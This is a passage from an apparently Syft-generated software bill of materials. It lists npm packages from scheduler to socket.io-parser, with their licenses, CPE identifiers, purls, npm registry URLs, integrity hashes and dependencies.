r-buffer-2.1.2.tgz","integrity":"sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==","dependencies":null}},{"id":"e689757d7bf8470d","name":"scheduler","version":"0.17.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:scheduler:scheduler:0.17.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/scheduler@0.17.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/scheduler/-/scheduler-0.17.0.tgz","integrity":"sha512-7rro8Io3tnCPuY4la/NuI5F2yfESpnfZyT6TtkXnSWVkcu0BCDJ+8gk5ozUaFaxpIyNuWAPXrH0yFcSi28fnDA==","dependencies":{"loose-envify":"^1.1.0","object-assign":"^4.1.1"}}},{"id":"d0ebbd8a4bc7ada1","name":"scheduler","version":"0.23.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:scheduler:scheduler:0.23.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/scheduler@0.23.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz","integrity":"sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ==","dependencies":{"loose-envify":"^1.1.0"}}},{"id":"607830ce210254e3","name":"scmp","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:scmp:scmp:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/scmp@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/scmp/-/scmp-2.1.0.tgz","integrity":"sha512-o/mRQGk9Rcer/jEEw/yw4mwo3EU/NvYvp577/Btqrym9Qy5/MdWGBqipbALgd2lrdWTJ5/gqDusxfnQBxOxT2Q==","dependencies":null}},{"id":"a6fb1c756dcd04fc","name":"selderee","version":"0.11.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:selderee:selderee:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/selderee@0.11.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/selderee/-/selderee-0.11.0.tgz","integrity":"sha512-5TF+l7p4+OsnP8BCCvSyZiSPc4x4//p5uPwK8TCnVPJYRmU2aYKMpOXvw8zM5a5JvuuCGN1jmsMwuU2W02ukfA==","dependencies":{"parseley":"^0.12.0"}}},{"id":"dc47801cc9b2ec78","name":"semver","version":"7.7.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:npmjs:semver:7.7.4:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/semver@7.7.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/semver/-/semver-7.7.4.tgz","integrity":"sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==","dependencies":null}},{"id":"1d81dd407a94f88a","name":"send","version":"0.19.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:send_project:send:0.19.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/send@0.19.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/send/-/send-0.19.2.tgz","integrity":"sha512-VMbMxbDeehAxpOtWJXlcUS5E8iXh6QmN+BkRX1GARS3wRaXEEgzCcB10gTQazO42tpNIya8xIyNx8fll1OFPrg==","dependencies":{"debug":"2.6.9","depd":"2.0.0","destroy":"1.2.0","encodeurl":"~2.0.0","escape-html":"~1.0.3","etag":"~1.8.1","fresh":"~0.5.2","http-errors":"~2.0.1","mime":"1.6.0","ms":"2.1.3","on-finished":"~2.4.1","range-parser":"~1.2.1","statuses":"~2.0.2"}}},{"id":"0a7cfe5561f2b18b","name":"serve-static","version":"1.16.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:serve-static:serve-static:1.16.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:serve-static:serve_static:1.16.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:serve_static:serve-static:1.16.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:serve_static:serve_static:1.16.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:serve:serve-static:1.16.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:serve:serve_static:1.16.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/serve-static@1.16.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/serve-static/-/serve-static-1.16.3.tgz","integrity":"sha512-x0RTqQel6g5SY7Lg6ZreMmsOzncHFU7nhnRWkKgWuMTu5NN0DR5oruckMqRvacAN9d5w6ARnRBXl9xhDCgfMeA==","dependencies":{"encodeurl":"~2.0.0","escape-html":"~1.0.3","parseurl":"~1.3.3","send":"~0.19.1"}}},{"id":"afe02a75a981b13d","name":"set-blocking","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:set-blocking:set-blocking:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:set-blocking:set_blocking:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:set_blocking:set-blocking:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:set_blocking:set_blocking:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:set:set-blocking:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:set:set_blocking:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/set-blocking@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz","integrity":"sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==","dependencies":null}},{"id":"fc983ad918ad063a","name":"setprototypeof","version":"1.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:setprototypeof:setprototypeof:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/setprototypeof@1.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz","integrity":"sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==","dependencies":null}},{"id":"f96d5af8de184f83","name":"sharp","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:sharp_project:sharp:0.34.5:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/sharp@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz","integrity":"sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg==","dependencies":{"@img/colour":"^1.0.0","detect-libc":"^2.1.2","semver":"^7.7.3"}}},{"id":"14d8b5cbe6162ddd","name":"shebang-command","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:shebang-command:shebang-command:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang-command:shebang_command:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang_command:shebang-command:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang_command:shebang_command:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang:shebang-command:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang:shebang_command:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/shebang-command@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz","integrity":"sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==","dependencies":{"shebang-regex":"^3.0.0"}}},{"id":"b86e26fe1fc6c7c9","name":"shebang-regex","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:shebang-regex:shebang-regex:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang-regex:shebang_regex:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang_regex:shebang-regex:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang_regex:shebang_regex:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang:shebang-regex:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:shebang:shebang_regex:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/shebang-regex@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz","integrity":"sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==","dependencies":null}},{"id":"a236188908f1e843","name":"side-channel","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:side-channel:side-channel:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel:side_channel:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side-channel:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side_channel:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side-channel:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side_channel:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/side-channel@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz","integrity":"sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==","dependencies":{"es-errors":"^1.3.0","object-inspect":"^1.13.3","side-channel-list":"^1.0.0","side-channel-map":"^1.0.1","side-channel-weakmap":"^1.0.2"}}},{"id":"2e4a230ff21329f1","name":"side-channel-list","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:side-channel-list:side-channel-list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel-list:side_channel_list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel_list:side-channel-list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel_list:side_channel_list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel:side-channel-list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel:side_channel_list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side-channel-list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side_channel_list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side-channel-list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side_channel_list:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/side-channel-list@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz","integrity":"sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==","dependencies":{"es-errors":"^1.3.0","object-inspect":"^1.13.4"}}},{"id":"36c9d18daa63eabd","name":"side-channel-map","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:side-channel-map:side-channel-map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel-map:side_channel_map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel_map:side-channel-map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel_map:side_channel_map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel:side-channel-map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel:side_channel_map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side-channel-map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side_channel_map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side-channel-map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side_channel_map:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/side-channel-map@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz","integrity":"sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==","dependencies":{"call-bound":"^1.0.2","es-errors":"^1.3.0","get-intrinsic":"^1.2.5","object-inspect":"^1.13.3"}}},{"id":"3a35b0f8b53bc97a","name":"side-channel-weakmap","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:side-channel-weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel-weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel_weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel_weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side-channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side_channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:side:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/side-channel-weakmap@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz","integrity":"sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==","dependencies":{"call-bound":"^1.0.2","es-errors":"^1.3.0","get-intrinsic":"^1.2.5","object-inspect":"^1.13.3","side-channel-map":"^1.0.1"}}},{"id":"a63ea3d2efb32143","name":"signal-exit","version":"4.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:signal-exit:signal-exit:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:signal-exit:signal_exit:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:signal_exit:signal-exit:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:signal_exit:signal_exit:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:signal:signal-exit:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:signal:signal_exit:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/signal-exit@4.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz","integrity":"sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==","dependencies":null}},{"id":"cef7b2b2b70b3db8","name":"simple-swizzle","version":"0.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:simple-swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:simple-swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:simple_swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:simple_swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:simple:simple-swizzle:0.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:simple:simple_swizzle:0.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/simple-swizzle@0.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/simple-swizzle/-/simple-swizzle-0.2.4.tgz","integrity":"sha512-nAu1WFPQSMNr2Zn9PGSZK9AGn4t/y97lEm+MXTtUDwfP0ksAIX4nO+6ruD9Jwut4C49SB1Ws+fbXsm/yScWOHw==","dependencies":{"is-arrayish":"^0.3.1"}}},{"id":"5cc521e50bb4314d","name":"socket.io","version":"4.8.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:socket:socket.io:4.8.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/socket.io@4.8.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/socket.io/-/socket.io-4.8.3.tgz","integrity":"sha512-2Dd78bqzzjE6KPkD5fHZmDAKRNe3J15q+YHDrIsy9WEkqttc7GY+kT9OBLSMaPbQaEd0x1BjcmtMtXkfpc+T5A==","dependencies":{"accepts":"~1.3.4","base64id":"~2.0.0","cors":"~2.8.5","debug":"~4.4.1","engine.io":"~6.6.0","socket.io-adapter":"~2.5.2","socket.io-parser":"~4.2.4"}}},{"id":"423a38d81e2dc8e3","name":"socket.io-adapter","version":"2.5.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:socket.io-adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io-adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io_adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io_adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io:socket.io-adapter:2.5.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io:socket.io_adapter:2.5.6:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/socket.io-adapter@2.5.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.5.6.tgz","integrity":"sha512-DkkO/dz7MGln0dHn5bmN3pPy+JmywNICWrJqVWiVOyvXjWQFIv9c2h24JrQLLFJ2aQVQf/Cvl1vblnd4r2apLQ==","dependencies":{"debug":"~4.4.1","ws":"~8.18.3"}}},{"id":"ecd3152d103ea0f9","name":"socket.io-client","version":"4.8.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:socket.io-client:socket.io-client:4.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io-client:socket.io_client:4.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io_client:socket.io-client:4.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io_client:socket.io_client:4.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io:socket.io-client:4.8.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:socket.io:socket.io_client:4.8.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/socket.io-client@4.8.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/socket.io-client/-/socket.io-client-4.8.3.tgz","integrity":"sha512-uP0bpjWrjQmUt5DTHq9RuoCBdFJF10cdX9X+a368j/Ft0wmaVgxlrjvK3kjvgCODOMMOz9lcaRzxmso0bTWZ/g==","dependencies":{"@socket.io/component-emitter":"~3.1.0","debug":"~4.4.1","engine.io-client":"~6.6.1","socket.io-parser":"~4.2.4"}}},{"id":"f9190921d6308e46","name":"socket.io-parser","version":"4.2.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","ann